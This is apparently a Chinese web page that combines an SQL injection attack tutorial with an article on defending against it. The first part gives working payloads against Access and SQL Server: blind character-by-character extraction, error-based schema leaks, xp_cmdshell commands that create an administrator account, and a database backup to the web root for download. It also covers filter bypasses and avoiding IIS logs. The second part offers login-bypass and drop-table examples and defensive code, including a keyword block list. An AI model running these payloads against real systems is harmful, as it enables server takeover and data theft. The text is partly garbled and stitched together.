在入門篇����,我們學會了SQL注入的判斷方法����,但真正要拿到網站的保密內容,是遠遠不夠的�。接下來,我們就繼續(xù)學習如何從數據庫中獲取想要獲得的內容���,首先,我們先看看SQL注入的一般步驟:
第一節(jié)��、SQL注入的一般步驟
首先���,判斷環(huán)境��,尋找注入點���,判斷數據庫類型,這在入門篇已經講過了�。
其次���,根據注入參數類型,在腦海中重構SQL語句的原貌�,按參數類型主要分為下面三種:
(A) ID=49 這類注入的參
數是數字型,SQL語句原貌大致如下:
Select * from 表名 where 字段=49
注入的參數為ID=49 And [查詢條件]���,即是生成語句:
Select * from 表名 where 字段=49 And [查詢條件]
(B) Class=連續(xù)劇 這類注入的參數是字符型�����,SQL語句原貌大致概如下:
Select * from 表名 where 字段=’連續(xù)劇’
注入的參數為Class=連續(xù)劇’ and [查詢條件] and ‘’=’ ��,即是生成語句:
Select * from 表名 where 字段=’連續(xù)劇’ and [查詢條件] and ‘’=’’
? 搜索時沒過濾參數的����,如keyword=關鍵字�����,SQL語句原貌大致如下:
Select * from 表名 where 字段like ’%關鍵字%’
注入的參數為keyword=’ and [查詢條件] and ‘%25’=’��, 即是生成語句:
Select * from 表名 where字段like ’%’ and [查詢條件] and ‘%’=’%’
接著����,將查詢條件替換成SQL語句����,猜解表名����,例如:
ID=49 And (Select Count(*) from Admin)=0
如果頁面就與ID=49的相同,說明附加條件成立�,即表Admin存在,反之����,即不存在(請牢記這種方法)。如此循環(huán)����,直至猜到表名為止���。
表名猜出來后����,將Count(*)替換成Count(字段名)�,用同樣的原理猜解字段名。
有人會說:這里有一些偶然的成分�,如果表名起得很復雜沒規(guī)律的��,那根本就沒得玩下去了��。說得很對��,這世界根本就不存在100%成功的黑客技術�����,蒼蠅不叮無縫的蛋��,無論多技術多高深的黑客�,都是因為別人的程序寫得不嚴密或使用者保密意識不夠���,才有得下手����。
有點跑題了����,話說回來,對于SQLServer的庫�����,還是有辦法讓程序告訴我們表名及字段名的,我們在高級篇中會做介紹����。
最后,在表名和列名猜解成功后�����,再使用SQL語句��,得出字段的值�����,下面介紹一種最常用的方法-Ascii逐字解碼法�����,雖然這種方法速度很慢����,但肯定是可行的方法���。
我們舉個例子�,已知表Admin中存在username字段,首先����,我們取第一條記錄,測試長度:
;and (select top 1 len(username) from Admin)0
先說明原理:如果top 1的username長度大于0�,則條件成立;接著就是1�����、2��、3這樣測試下去����,一直到條件不成立為止,比如7成立�,8不成立,就是len(username)=8
當然沒人會笨得從0,1,2,3一個個測試���,怎么樣才比較快就看各自發(fā)揮了�����。在得到username的長度后�,用mid(username,N,1)截取第N位字符,再asc(mid(username,N,1))得到ASCII碼�,比如:
id=49 and (select top 1 asc(mid(username,1,1)) from Admin)0
同樣也是用逐步縮小范圍的方法得到第1位字符的ASCII碼,注意的是英文和數字的ASCII碼在1-128之間�����,可以用折半法加速猜解���,如果寫成程序測試����,效率會有極大的提高�。
第二節(jié)、SQL注入常用函數
有SQL語言基礎的人�,在SQL注入的時候成功率比不熟悉的人高很多。我們有必要提高一下自己的SQL水平�,特別是一些常用的函數及命令。
Access:asc(字符) SQLServer:unicode(字符)
作用:返回某字符的ASCII碼
Access:chr(數字) SQLServer:nchar(數字)
作用:與asc相反�����,根據ASCII碼返回字符
Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)
作用:返回字符串從N個字符起長度為L的子字符串���,即N到N+L之間的字符串
Access:abc(數字) SQLServer:abc (數字)
作用:返回數字的絕對值(在猜解漢字的時候會用到)
Access:A between B And C SQLServer:A between B And C
作用:
判斷A是否界于B與C之間
第三節(jié)�����、中文處理方法
在注入中碰到中文字符是常有的事����,有些人一碰到中文字符就想打退堂鼓了��。其實只要對中文的編碼有所了解���,“中文恐懼癥”很快可以克服���。
先說一點常識:
Access中,中文的ASCII碼可能會出現負數�,取出該負數后用abs()取絕對值,漢字字符不變����。
SQL Server中,中文的ASCII為正數�,但由于是UNICODE的雙位編碼,不能用函數ascii()取得ASCII碼���,必須用函數unicode ()返回unicode值�,再用nchar函數取得對應的中文字符。
了解了上面的兩點后��,是不是覺得中文猜解其實也跟英文差不多呢�����?除了使用的函數要注意��、猜解范圍大一點外���,方法是沒什么兩樣的��。
高級篇
看完入門篇和進階篇后����,稍加練習��,破解一般的網站是沒問題了���。但如果碰到表名列名猜不到��,或程序作者過濾了一些特殊字符���,怎么提高注入的成功率�?怎么樣提高猜解效率���?請大家接著往下看高級篇。
第一節(jié)����、利用系統(tǒng)表注入SQLServer數據庫
SQL Server是一個功能強大的數據庫系統(tǒng),與操作系統(tǒng)也有緊密的聯系���,這給開發(fā)者帶來了很大的方便�,但另一方面�����,也為注入者提供了一個跳板�,我們先來看看幾個具體的例子
:
① ;exec master..xp_cmdshell “net user name password /add”--
分號;在SQLServer中表示隔開前后兩句語句,--表示后面的語句為注釋�����,所以��,這句語句在SQLServer中將被分成兩句執(zhí)行,先是Select出ID=1的記錄���,然后執(zhí)行存儲過程xp_cmdshell���,這個存儲過程用于調用系統(tǒng)命令,于是��,用net命令新建了用戶名為name���、密碼為password的windows的帳號�����,接著:
② ;exec master..xp_cmdshell “net localgroup name administrators /add”--
將新建的帳號name加入管理員組���,不用兩分鐘,你已經拿到了系統(tǒng)最高權限����!當然,這種方法只適用于用sa連接數據庫的情況����,否則���,是沒有權限調用xp_cmdshell的。
③ ;and db_name()0
前面有個類似的例子and user0����,作用是獲取連接用戶名,db_name()是另一個系統(tǒng)變量���,返回的是連接的數據庫名。
④ ;backup database 數據庫名 to disk=’c:\inetpub\wwwroot\1.db’;--
這是相當狠的一招�,從③拿到的數據庫名,加上某些IIS出錯暴露出的絕對路徑�����,將數據庫備份到Web目錄下面��,再用HTTP把整個數據庫就完完整整的下載回來�����,所有的管理員及用戶密碼都一覽無遺��!在不知道絕對路徑的時候��,還可以備份到網絡地址的方法(如\202.96.xx.xx\Share \1.db),但成功率不高��。
⑤ ;and (Select Top 1 name from sysobjects where xtype=’U’ and status0)0
前面說過����,sysobjects是SQLServer的系統(tǒng)表,存儲著所有的表名����、視圖、約束及其它對象�,xtype=’U’ and status0,表示用戶建立的表名�����,上面的語句將第一個表名取出�,與0比較大小,讓報錯信息把表名暴露出來���。第二��、第三個表名怎么獲?����?��?還是留給我們聰明的讀者思考吧����。
⑥ ;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)0
從⑤拿到表名后�,用object_id(‘表名’)獲取表名對應的內部ID,col_name(表名ID,1)代表該表的第1個字段名����,將1換成2,3,4...就可以逐個獲取所猜解表里面的字段名����。
以上6點是我研究SQLServer注入半年多以來的心血結晶,可以看出�,對SQLServer的了解程度,直接影響著成功率及猜解速度��。在我研究SQLServer注入之后��,我在開發(fā)方面的水平也得到很大的提高���,呵呵,也許安全與開發(fā)本來就是相輔相成的吧。
第二節(jié)�、繞過程序限制繼續(xù)注入
在入門篇提到,有很多人喜歡用’號測試注入漏洞��,所以也有很多人用過濾’號的方法來“防止”注入漏洞��,這也許能擋住一些入門者的攻擊��,但對SQL注入比較熟悉的人�,還是可以利用相關的函數����,達到繞過程序限制的目的。
在“SQL注入的一般步驟”一節(jié)中����,我所用的語句,都是經過我優(yōu)化�,讓其不包含有單引號的;在“利用系統(tǒng)表注入SQLServer數據庫”中�����,有些語句包含有’號����,我們舉個例子來看
看怎么改造這些語句:
簡單的如where xtype=’U’��,字符U對應的ASCII碼是85����,所以可以用where xtype=char(85)代替���;如果字符是中文的�����,比如where name=’用戶’����,可以用where name=nchar(29992)+nchar(25143)代替��。
第三節(jié)�����、經驗小結
1.有些人會過濾Select����、Update、Delete這些關鍵字��,但偏偏忘記區(qū)分大小寫���,所以大家可以用selecT這樣嘗試一下�����。
2.在猜不到字段名時��,不妨看看網站上的登錄表單�����,一般為了方便起見�,字段名都與表單的輸入框取相同的名字�����。
3.特別注意:地址欄的+號傳入程序后解釋為空格����,%2B解釋為+號,%25解釋為%號�����,具體可以參考URLEncode的相關介紹。
4.用Get方法注入時��,IIS會記錄你所有的提交字符串���,對Post方法做則不記錄����,所以能用Post的網址盡量不用Get�。
5. 猜解Access時只能用Ascii逐字解碼法,SQLServer也可以用這種方法���,只需要兩者之間的區(qū)別即可����,但是如果能用SQLServer的報錯信息把值暴露出來�����,那效率和準確率會有極大的提高��。
防范方法
SQL注入漏洞可謂是“千里之堤�,潰于蟻穴”,這種漏洞在網上極為普遍����,通常是由于程序員對注入不了解,或者程序過濾不嚴格��,或者某個參數忘記檢查導致����。在這里,我給大家一個函數�,代替ASP中的Request函數,可以對一切的SQL注入Say NO��,函數如下:
Function SafeRequest(ParaName,ParaType)
'--- 傳入參數 ---
'ParaName:參數名稱-字符型
'ParaType:參數類型-數字型(1表示以上參數是數字����,0表示以上參數為字符)
Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "參數" ParaName "必須為數字型!"
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function
文章到這里就結束了�,不管你是安全人員、技術愛好者還是程序員��,我都希望本文能對你有所幫助���。
試解釋 SQL 注入攻擊的原理����,以及對數據庫可能產生的不利影響。
SQL注入就是攻擊者通過正常的WEB頁面,把自己SQL代碼傳入到應用程序中,從而通過執(zhí)行非程序員預期的SQL代碼,達到竊取數據或破壞的目的���。
當應用程序使用輸入內容來構造動態(tài)SQL語句以訪問數據庫時�����,會發(fā)生SQL注入攻擊����。如果代碼使用存儲過程�,而這些存儲過程作為包含未篩選的用戶輸入的字符串來傳遞,也會發(fā)生SQL注入����。SQL注入可能導致攻擊者使用應用程序登陸在數據庫中執(zhí)行命令。如果應用程序使用特權過高的帳戶連接到數據庫���,這種問題會變得很嚴重�����。在某些表單中���,用戶輸入的內容直接用來構造(或者影響)動態(tài)SQL命令,或者作為存儲過程的輸入參數�,這些表單特別容易受到SQL注入的攻擊。而許多網站程序在編寫時��,沒有對用戶輸入的合法性進行判斷或者程序中本身的變量處理不當���,使應用程序存在安全隱患��。這樣���,用戶就可以提交一段數據庫查詢的代碼,根據程序返回的結果��,獲得一些敏感的信息或者控制整個服務器����,于是SQL注入就發(fā)生了。
一般SQL注入
在Web 應用程序的登錄驗證程序中,一般有用戶名(username) 和密碼(password) 兩個參數,程序會通過用戶所提交輸入的用戶名和密碼來執(zhí)行授權操作��。我們有很多人喜歡將SQL語句拼接起來�。例如:
Select * from users where username =’ txtusername.Text ’ and password =’ txtpassword.Text ’
其原理是通過查找users 表中的用戶名(username) 和密碼(password) 的結果來進行授權訪問, 在txtusername.Text為mysql,txtpassword.Text為mary���,那么SQL查詢語句就為:
Select * from users where username =’ mysql ’ and password =’ mary ’
如果分別給txtusername.Text 和txtpassword.Text賦值’ or ‘1’ = ‘1’ --和abc����。那么,SQL 腳本解釋器中的上述語句就會變?yōu)?
Select * from users where username =’’or ‘1’ = ‘1’ -- and password =’abc’
該語句中進行了兩個條件判斷,只要一個條件成立,就會執(zhí)行成功。而'1'='1'在邏輯判斷上是恒成立的,后面的"--" 表示注釋,即后面所有的語句為注釋語句這樣我們就成功登錄�。即SQL注入成功.
如果我們給txtusername.Text賦值為:’;drop table users--即:
Select * from users where username =’’;drop table users-- and password =’abc’
整個用戶表就沒有了,當然這里要猜出數據表名稱��。想想是多么可怕的事情���。
好我想大家在這里已經大致明白了一般SQL注入了���,試想下您的登錄程序會不會出現我上述的情況。
防范SQL注入
那么現在大家都在思考怎么防范SQL注入了這里給出一點個人的建議
1.限制錯誤信息的輸出
這個方法不能阻止SQL注入�����,但是會加大SQL注入的難度���,不會讓注入者輕易得到一些信息�����,讓他們任意破壞數據庫�����。SQL Server有一些系統(tǒng)變量���,如果我們沒有限制錯誤信息的輸出,那么注入著可以直接從出錯信息獲取�,例如(假定這里用的string即字符類型并可以發(fā)生SQL注入): and user0 這句語句很簡單,但卻包含了SQL Server特有注入方法的精髓��,����。首先看看它的含義:首先,前面的語句是正常的��,重點在and user0����,我們知道,user是SQL Server的一個內置變量���,它的值是當前連接的用戶名��,類型為nvarchar����。拿一個nvarchar的值跟int的數0比較,系統(tǒng)會先試圖將nvarchar的值轉成int型�����,當然���,轉的過程中肯定會出錯�,SQL Server的出錯提示是:將nvarchar值 ”abc” 轉換數據類型為 int 的列時發(fā)生語法錯誤����,呵呵,abc正是變量user的值����,這樣,注入著就拿到了數據庫的用戶名�。
眾所周知,SQL Server的用戶sa是個等同Adminstrators權限的角色�,拿到了sa權限,幾乎肯定可以拿到主機的Administrator了���。上面的方法可以很方便的測試出是否是用sa登錄����,要注意的是:如果是sa登錄,提示是將”dbo”轉換成int的列發(fā)生錯誤�,而不是”sa”。
當然注入者還可以輸入不同的信息來得到他們想要的信息 �,上面只是其中一個例子,所以我們要限制錯誤信息的輸出�,從而保護我們的數據庫數據��,這里我給出.NET限制錯誤信息的方法:
在Web.Config文件中設置
customErrors mode="On" defaultRedirect="error.aspx"
/customErrors
這樣當發(fā)生錯誤時候就不會講信息泄露給外人�。
2.限制訪問數據庫帳號的權限
對于數據庫的任何操作都是以某種特定身份和相應權限來完成的,SQL語句執(zhí)行前,在數據庫服務器端都有一個用戶權限驗證的過程,只有具備相應權限的帳號才可能執(zhí)行相應權限內的SQL語句。因此,限制數據庫帳號權限,實際上就阻斷了某些SQL語句執(zhí)行的可能�。不過,這種方法并不能根本解決SQL注入問題,因為連接數據庫的帳號幾乎總是比其他單個用戶帳號擁有更多的權限。通過限制貼帳號權限,可以防止刪除表的攻擊,但不能阻止攻擊者偷看別人的信息�����。
3.參數化使用命令
參數化命令是在SQL文本中使用占位符的命令���。占位符表示需要動態(tài)替換的數據,它們通過Command對象Parameters集合來傳送���。能導致攻擊的SQL代碼可以寫成:
Select * from employee where userID=@userID;
如果用戶輸入: 09105022’OR ‘1’=’1,將得不到何記錄,因為沒有一個用戶ID與文本框中輸入的’ 09105022’OR ‘1’=’1’相等。參數化命令的語法隨提供程序的不同略有差異。對于SQL SERVER提供程序,參數化命令使用命名的占位符(具有唯一的名字),而對于OLE DB提供程序,每個硬編碼的值被問號代替���。使用OLE DB提供程序時,需要保證參數的順序和它們出現在SQL字符串中的位置一致��。SQL SERVER提供程序沒有這樣的需求,因為它們用名字和占位符匹配���。
4.調用存儲過程
存儲過程是存儲在數據庫服務器上的一系列SQL代碼,存儲過程與函數相似,有良好的邏輯封裝結構,可以接收和返回數據。使用存儲過程可以使代碼更易于維護,因為對存儲過程的更改不會導致應用程序的重新編譯,使用存儲過程還可以節(jié)省帶寬,提高應用程序性能��。因為存儲過程是存儲在數據庫服務端的獨立的封裝體,調用存儲過程可以保證應用程序只執(zhí)行存儲過程中的固定代碼,從而杜絕SQL語句注入的可能���。結合上述所講的參數化命令,可以實現SQL代碼可以實現的任何功能,并進一步提高應用程序的安全等級�。
5.限制輸入長度
如果在Web頁面上使用文本框收集用戶輸入的數據,使用文本框的MaxLength屬性來限制用戶輸入過長的字符也是一個很好的方法,因為用戶的輸入不夠長,也就減少了貼入大量腳本的可能性�����。程序員可以針對需要收集的數據類型作出一個相應的限制策略����。
6.URL重寫技術
我們利用URL重寫技術過濾一些SQL注入字符,從而達到防御SQL注入����。因為許多SQL注入是從URL輸入發(fā)生的���。
7.傳遞參數盡量不是字符
假設我們顯示一篇新聞的頁面,從URL傳遞參數中獲得newid我們可能會隨手寫下下面的代碼:
string newsid = Request.QueryString["newsid"];
string newssql = "select * from news where newsid=" + newsid;
如果傳遞過來的參數是數字字符就沒有問題��。但是如果傳遞過來的newsid是“1 delete from table ”的話���,那么sql的值就變成了“select * from table where newsid=1 delete from news”��。發(fā)生注入成功���。但是這里改為
int newsid=int.Parse(Request.QueryString["newsid"].ToString());
string newssql = "select * from news where newsid=" + newsid.Tostring();
這里如果還是上面"1 delete from table "會發(fā)生錯誤,因為在轉換時候出現了錯誤
從上面的一個小例子�����,我們得出在傳遞參數時候盡量不要用字符��,免得被注入���。
最后是我想擴展下利用URL重寫技術來過濾一些SQL注入字符,首先這里有一篇關于URL重寫的文章����,我的基本思想是可以利用它�����,屏蔽一些危險的SQL注入字符串����,這些字符串我們可以人為的設定��,畢竟我們還是根據特定的環(huán)境設定我們防御措施�。首先我們在ModuleRewriter類中的Rewrite函數得到絕對的URL判斷其中是否有危險字符,如果有我們就將它鏈接到一個提示用戶您輸入危險的URL地址�����。如果不是我們繼續(xù)判斷是否觸發(fā)了其他的URL重寫的規(guī)則���,觸發(fā)了就重寫�����。這樣就大致上能在URL上防御危險字符��。
代碼
configSections
section name="RewriterConfig" type="URLRewriter.Config.RewriterConfigSerializerSectionHandler, URLRewriter" /
/configSections
RewriterConfig
Rules
RewriterRule
LookFor~/d(\d+)\.aspx/LookFor
SendTo~/Default_sql_error.aspx/SendTo
/RewriterRule
RewriterRule
LookFor~/d(\d+)\.aspx/LookFor
SendTo~/Default2.aspx/SendTo
/RewriterRule
/Rules
/RewriterConfig
httpModules
add type="URLRewriter.ModuleRewriter, URLRewriter" name="ModuleRewriter" /
/httpModules
上面是要在web.config配置文件加上的內容����,這里我加上了兩個重寫規(guī)則,第一個規(guī)則是專門針對滿足這個正則表達式的頁面URL查看是否有危險字符��,有危險字符就會發(fā)送到Default_sql_error.aspx頁面�,來示警。這里我假定會發(fā)生危險字符注入的頁面時以"d"字符開頭并加上數字的頁面(這里我們可以根據實際情況自己定義�,看哪些頁面URL容易發(fā)生我們就制定這些頁面的正則表達式),第二個是一般URL重寫��。因為這里我采用的是HTTP模塊執(zhí)行URL重寫���,所以加上httpModules/httpModules這一塊�。
第二步就是要在重寫Rewrite函數了
代碼
protected override void Rewrite(string requestedPath, System.Web.HttpApplication app)
{
// 獲得配置規(guī)則
RewriterRuleCollection rules = RewriterConfiguration.GetConfig().Rules;
//獲得絕對的URL
Uri url = app.Request.Url;
// 判斷url 中是否含有SQL 注入攻擊敏感的字符或字符串,如果存在,sqlatFlag = 1 ;
string urlstr = url.AbsoluteUri;
int sqlatFlag = 0;
//這里我們根據實際情況隨便編寫���,我這里這是隨便列舉了幾個
string words = "exec ,xp ,sp ,declare ,cmd ,Union ,--";
string[] split = words.Split(',');
foreach (string s in split)
{
if (urlstr.IndexOf(s.ToUpper()) 0)
{
sqlatFlag = 1;
break;
}
}
if (sqlatFlag == 1)
{
// 創(chuàng)建regex
Regex re = new Regex(rules[0].SendTo, RegexOptions.IgnoreCase);
// 找到匹配的規(guī)則,進行必要的替換
string sendToUrl = RewriterUtils.ResolveUrl(app.Context.Request.ApplicationPath, re.ToString());
// 重寫URL
RewriterUtils.RewriteUrl(app.Context, sendToUrl);
}
else
{
// 遍歷除rules[0 ]以外的其他URL 重寫規(guī)則
for (int i = 1; i rules.Count; i++)
{
// 獲得要查找的模式,并且解析URL (轉換為相應的目錄)
string lookFor = "^" + RewriterUtils.ResolveUrl(app.Context.Request.ApplicationPath, rules[i].LookFor) + "$";
// 創(chuàng)建regex
Regex re = new Regex(lookFor, RegexOptions.IgnoreCase);
// 查看是否找到了匹配的規(guī)則
if (re.IsMatch(requestedPath))
{
// 找到了匹配的規(guī)則, 進行必要的替換
string sendToUrl = RewriterUtils.ResolveUrl(app.Context.Request.ApplicationPath, re.Replace(requestedPath, rules[i].SendTo));
// 重寫URL
RewriterUtils.RewriteUrl(app.Context, sendToUrl);
break;
// 退出For 循環(huán)
}
}
}
}
那么下一步就是檢驗例子了
首先我們輸入;--
這樣;-- 沒有改變����,就會顯示Default_sql_error.aspx里內容“您輸入了危險字符”��。
再輸入就會顯示 Default2.aspx內容�,因為這里觸發(fā)了第二個重寫規(guī)則
網頁題目:nosql注入攻擊與實踐,aql注入攻擊
標題網址:
http://weahome.cn/article/hdgisd.html
重慶分公司
重慶分公司
